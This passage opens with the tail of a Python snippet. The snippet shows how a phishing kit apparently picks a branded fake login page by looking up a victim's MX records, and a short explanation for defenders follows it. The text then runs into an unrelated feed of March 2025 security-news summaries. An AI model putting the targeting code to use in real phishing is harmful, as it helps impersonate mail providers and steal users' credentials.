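    "example.com": [(10, "example-com.mail.protection.outlook.com.")],
    "example.org": [(20, "alt1.aspmx.l.google.com."), (10, "aspmx.l.google.com.")],
    "example.net": [(10, "mxa-00123456.gslb.pphosted.com.")],
    "nomx.example": [],
}


def mail_domain(address):
    """Return the lower-cased domain part of an e-mail address."""
    local, sep, domain = address.rpartition("@")
    if not sep or not local or not domain:
        raise ValueError(f"not an e-mail address: {address!r}")
    return domain.lower().rstrip(".")


def provider_for(mx_records):
    """Map a list of (preference, exchange) MX records to a provider name.
    Records are tried lowest-preference first, the order a real MTA uses."""
    for _pref, exchange in sorted(mx_records):
        host = exchange.lower().rstrip(".")
        for suffix, provider in PROVIDER_BY_MX_SUFFIX.items():
            if host.endswith(suffix):
                return provider
    return GENERIC_TEMPLATE


def choose_template(address, resolve_mx):
    """What a kit would serve to this victim: the provider's page, or the
    generic page when the address is malformed, has no MX, or none match."""
    try:
        domain = mail_domain(address)
    except ValueError:
        return GENERIC_TEMPLATE
    return provider_for(resolve_mx(domain))


def sample_resolver(domain):
    """Offline stand-in for a DNS lookup; unknown domains resolve to no MX."""
    return SAMPLE_MX.get(domain, [])


if __name__ == "__main__":
    for victim in ("alice@example.com", "bob@example.org", "dave@nomx.example"):
        print(victim, "->", choose_template(victim, sample_resolver))
```

The fallback to a generic page is the part worth noting for defenders: a domain fronted by a mail-security gateway (the pphosted.com case above) hides the real provider from this lookup, so the lure is less convincing there, whereas a domain whose MX points straight at a well-known provider gives the kit exactly the branding it needs.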
Crew also cooked up two fresh SparrowDoor backdoor variants, says ESET The China-aligned FamousSparrow crew has resurfaced after a long period of presumed inactivity, compromising a US financial-sector trade group and a Mexican research institute. The gang also likely targeted a governmental institution in Honduras, along with other yet-to-be-identified victims.
Published: 2025-03-27T22:06:58
WIRED has found four new Venmo accounts that appear to be associated with Trump officials who were in an infamous Signal chat. One made a payment with a note consisting solely of an eggplant emoji.
Published: 2025-03-27T21:47:31
A new analysis has uncovered connections between affiliates of RansomHub and other ransomware groups like Medusa, BianLian, and Play. The connection stems from the use of a custom tool that's designed to disable endpoint detection and response (EDR) software on compromised hosts, according to ESET. The EDR killing tool, dubbed EDRKillShifter, was first documented as used by RansomHub actors in
Published: 2025-03-27T19:40:00
Scandal surrounding the Trump administration’s Signal group chat has led to a landmark week for the encrypted messaging app’s adoption: its “largest US growth moment by a massive margin.”
Published: 2025-03-27T18:31:30
An advanced persistent threat (APT) group with ties to Pakistan has been attributed to the creation of a fake website masquerading as India's public sector postal system as part of a campaign designed to infect both Windows and Android users in the country. Cybersecurity company CYFIRMA has attributed the campaign with medium confidence to a threat actor called APT36, which is also known as
Published: 2025-03-27T18:01:00
Whether it’s CRMs, project management tools, payment processors, or lead management tools - your workforce is using SaaS applications by the pound. Organizations often rely on traditional CASB solutions for protecting against malicious access and data exfiltration, but these fall short for protecting against shadow SaaS, data damage, and more. A new report, Understanding SaaS Security Risks: Why
Published: 2025-03-27T16:55:00
Many successful phishing attacks result in a financial loss or malware infection. But falling for some phishing scams, like those currently targeting Russians searching online for organizations that are fighting the Kremlin war machine, can cost you ...
Published: 2025-03-27T16:39:49
Researchers say 'proactive' approach is needed to combat global cybercrime Here's one you don't see every day: A cybersecurity vendor is admitting to breaking into a notorious ransomware crew's infrastructure and gathering data it relayed to national agencies to help victims.
Published: 2025-03-27T16:32:09
Hackers have long used Word and Excel documents as delivery vehicles for malware, and in 2025, these tricks are far from outdated. From phishing schemes to zero-click exploits, malicious Office files are still one of the easiest ways into a victim’s system. Here are the top three Microsoft Office-based exploits still making the rounds this year and what you need to know to avoid them. 1.
Published: 2025-03-27T15:30:00
An ongoing campaign that infiltrates legitimate websites with malicious JavaScript injects to promote Chinese-language gambling platforms has ballooned to compromise approximately 150,000 sites to date. "The threat actor has slightly revamped their interface but is still relying on an iframe injection to display a full-screen overlay in the visitor's browser," c/side security analyst Himanshu
Published: 2025-03-27T13:43:00
Screenshot shows company head unhappy, claiming 'real CVE is pending' CrushFTP's CEO is not happy with VulnCheck after the CVE numbering authority (CNA) released an unofficial ID for the critical vulnerability in its file transfer tech disclosed almost a week ago.
Published: 2025-03-27T13:20:10
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two six-year-old security flaws impacting Sitecore CMS and Experience Platform (XP) to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerabilities are listed below - CVE-2019-9874 (CVSS score: 9.8) - A deserialization vulnerability in the Sitecore.Security.AntiCSRF
Published: 2025-03-27T11:53:00
A critical security flaw has been disclosed in NetApp SnapCenter that, if successfully exploited, could allow privilege escalation. SnapCenter is an enterprise-focused software that's used to manage data protection across applications, databases, virtual machines, and file systems, offering the ability to backup, restore, and clone data resources. The vulnerability, tracked as
Published: 2025-03-27T11:36:00
As if living in Croydon wasn't bad enough The Metropolitan Police has confirmed its first permanent installation of live facial recognition (LFR) cameras is coming this summer and the lucky location will be the South London suburb of Croydon.
Published: 2025-03-27T10:27:31
Data stolen included checklist for medics on how to get into vulnerable people's homes The UK's data protection watchdog is dishing out a £3.07 million ($3.95 million) fine to Advanced Computer Software Group, whose subsidiary's security failings led to a ransomware attack affecting NHS care.
Published: 2025-03-27T09:30:06
Vivaldi and Proton have teamed up to make it easier for Vivaldi browser users to privately explore the web without downloading a virtual private network (VPN). Starting today, the free version of Proton VPN is now integrated directly into Vivaldi's browser, and can be accessed by logging into a Vivaldi account. The feature is currently […]
Published: 2025-03-27T06:44:51
The Chinese threat actor known as FamousSparrow has been linked to a cyber attack targeting a trade group in the United States and a research institute in Mexico to deliver its flagship backdoor SparrowDoor and ShadowPad. The activity, observed in July 2024, marks the first time the hacking crew has deployed ShadowPad, a malware widely shared by Chinese state-sponsored actors. "FamousSparrow
Published: 2025-03-26T22:29:00
So F-18 launch times, weapons, drone support aren't classified now ... who knew? Updated The Atlantic's editor-in-chief who was inadvertently added to a Signal group in which the US Secretary of Defense, Vice President, and others discussed secret military plans has now publicly released the messages.
Published: 2025-03-26T21:16:32
A WIRED review shows national security adviser Mike Waltz, White House chief of staff Susie Wiles, and other top officials left sensitive information exposed via Venmo until WIRED asked about it.
Published: 2025-03-26T20:44:21
MORSE to pay -- .. .-.. .-.. .. --- -. ... for failing to meet cyber-grade A US defense contractor will cough up $4.6 million to settle complaints it failed to meet cybersecurity requirements on military contracts and knowingly submitted false claims for payment.
Published: 2025-03-26T20:07:11
The threat actor known as EncryptHub exploited a recently-patched security vulnerability in Microsoft Windows as a zero-day to deliver a wide range of malware families, including backdoors and information stealers such as Rhadamanthys and StealC. "In this attack, the threat actor manipulates .msc files and the Multilingual User Interface Path (MUIPath) to download and execute malicious payload,
Published: 2025-03-26T19:23:00
The Russian-speaking hacking group called RedCurl has been linked to a ransomware campaign for the first time, marking a departure in the threat actor's tradecraft. The activity, observed by Romanian cybersecurity company Bitdefender, involves the deployment of a never-before-seen ransomware strain dubbed QWCrypt. RedCurl, also called Earth Kapre and Red Wolf, has a history of orchestrating
Published: 2025-03-26T19:13:00
The Trump cabinet’s shocking leak of its plans to bomb Yemen raises myriad confidentiality and legal issues. The security of the encrypted messaging app Signal is not one of them.
Published: 2025-03-26T18:54:49
Victims' details at risk after criminals download 9,000 files from court database Australian police are currently investigating the theft of "sensitive" data from a New South Wales court system after they confirmed approximately 9,000 files were stolen.
Published: 2025-03-26T17:29:05
Bad news about the Linux system monitor may be on the way Updated Veteran sysadmin and tech blogger Rachel Kroll posted a cryptic warning yesterday about a popular Linux system monitoring tool. Maybe it's better to be safe than sorry.
Published: 2025-03-26T15:31:09
Who knew social media stars had a role to play in building national cyber resilience? The world's biggest brands have benefited from influencer marketing for years; now the UK's National Cyber Security Centre (NCSC) has hopped on the bandwagon to preach two-factor authentication (2FA) to the masses.
Published: 2025-03-26T11:00:13
On March 24th, The Atlantic's editor-in-chief Jeffrey Goldberg published a damning story about being added to the Houthi PC Small Group on Signal by Trump's national security adviser Mike Waltz. In it, he described inadvertently becoming privy to h
Published: 2025-03-26T10:58:12
Customers come forward claiming info was swiped from prod Oracle Cloud's denial of a digital break-in is now in clear dispute. An infosec researcher working on validating claims that the cloud provider's login servers were compromised earlier this year says some customers have confirmed data allegedly stolen and leaked from the database giant is genuine.
Published: 2025-03-25T17:35:42
16,000 stolen records pertain to former and active mail subscribers Infosec veteran Troy Hunt of HaveIBeenPwned fame is notifying thousands of people after phishers scooped up his Mailchimp mailing list.
Published: 2025-03-25T12:28:08
Just an FYI, like Generative AI assistants packaged up as browser extensions harvest personal data with minimal safeguards, researchers warn.
Published: 2025-03-25T08:31:12
There's only one rule: don't attack Russia, duh Check Point has spotted a fresh ransomware-as-a-service crew in town: VanHelsing, touting a cross-platform locker targeting Microsoft Windows, Linux, and VMware ESXi systems, among others. But so far, only Windows machines have fallen victim, we're told.
Published: 2025-03-25T07:32:07
DNA-testing company 23andMe has filed for bankruptcy, which means the future of the company’s vast trove of customer data is unknown. Here’s what that means for your genetic data.
Published: 2025-03-24T20:51:59
Crossing into the United States has become increasingly dangerous for digital privacy. Here are a few steps you can take to minimize the risk of Customs and Border Protection accessing your data.
Published: 2025-03-24T18:10:05
Getting added to the wrong group chat is a common problem, but what if that group chat is describing an upcoming military strike? That's what happened to The Atlantic editor-in-chief Jeffrey Goldberg, who was added to a Signal group chat formed by hi
Published: 2025-03-24T17:45:00
Connor Moucka, accused of stealing large amounts of customer data from companies that used Snowflake's cloud storage services, has agreed to be extradited to the US to face charges, Cyberscoop reports. Around 165 companies were affected by the Snowflake breaches, including AT&T and Ticketmaster. Alexander Connor Moucka, who was arrested in Canada on October 30th […]
Published: 2025-03-24T17:39:05
The ad hoc addition to the otherwise tightly controlled White House information environment could create blind spots and security exposures while setting potentially dangerous precedent.
Published: 2025-03-24T17:24:31
Companies in the EU are starting to look for ways to ditch Amazon, Google, and Microsoft cloud services amid fears of rising security risks from the US. But cutting ties won’t be easy.
Published: 2025-03-24T06:00:00
The US Air Force has announced that it will go ahead with the production of the F-47 Next Generation Air Dominance (NGAD) fighter. Expected to enter service by the end of the decade, it will replace the F-22 Raptor as America's air supremacy fighter....
Published: 2025-03-24T00:21:08
Authorities in at least two U.S. states last week independently announced arrests of Chinese nationals accused of perpetrating a novel form of tap-to-pay fraud using mobile devices. Details released by authorities so far indicate the mobile wallets b...
Published: 2025-03-21T19:12:04
Amid growing concerns over Big Tech firms aligning with Trump administration policies, people are starting to move their digital lives to services based overseas. Here's what you need to know.
Published: 2025-03-21T10:30:00
Google is taking down 10,000 fake business listings from Google Maps and suing a network of scammers who set them up, CBS News reports. The company's lawsuit alleges that a man connected to a broader scam network created fake business profiles on Google Maps and sold them for profit. Google was tipped off by a […]
Published: 2025-03-20T17:32:57
Chinese ecommerce giants like Temu and AliExpress sell drone accessories like those used by soldiers in the Russia-Ukraine conflict.
Published: 2025-03-20T09:00:00